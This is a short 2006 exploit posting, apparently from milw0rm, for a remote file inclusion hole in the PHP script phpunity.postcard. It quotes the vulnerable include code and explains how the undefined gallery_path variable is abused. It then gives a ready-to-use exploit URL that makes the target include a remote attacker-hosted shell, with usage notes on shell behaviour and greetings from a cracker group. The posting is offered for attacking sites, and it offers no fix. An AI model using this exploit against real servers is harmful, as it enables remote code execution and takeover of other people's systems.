# #
# phpunity.postcard (phpunity-postcard.php) Remote File Inclusion Exploit #
# #
# #
# Affected Software .: phpunity.postcard #
# Vendor ............: http://www.perlunity.de/ #
# Class .............: Remote File Inclusion #
# Risk ..............: high (Remote File Execution) #
# Found by ..........: Rivertam #
# Contact ...........: rivertam88[at]gmail[.]com #
# Discovered on .....: 04.09.2006 (dd.mm.yyyy) #
# Published on ......: 13.09.2006 (dd.mm.yyyy) #
# #
# #
# Affected File: #
# /phpunity-postcard.php #
# #
# Vulnerable Code: #
# if(isset($plgallery_epost)) { #
# $keep_url = "?".$_SERVER['QUERY_STRING']; #
# if(isset($gallery_path)) { #
# include("$gallery_path/admin/inc/config.inc.php"); #
# } else { #
# include("../../phpunity-easygallery/admin/inc/config.inc.php"); #
# } #
# } #
# #
# Description: #
# $gallery_path is not defined before being used and in the config it is #
# standardly out-commentated. To get into the if request we must define #
# $plgallery_epost as 1 (or somethings else) #
# #
# #
# Exploit: #
# http://[target]/phpunity-postcard.php?plgallery_epost=1&gallery_path=[shell]? #
# #
# #
# Notice: #
# Works not with the c99-php shell cause if you use it the plgallery_epost=1 #
# getting lost when you change dir or make another action and then the shell #
# unloads. #
# #
# #
# Greets: Rivertam [National Cracker Crew] #
# #
# #
# Greets to: #
# Silver, DOOMER85, Betta splendens and Dye #
# #
# milw0rm.com [2006-09-13]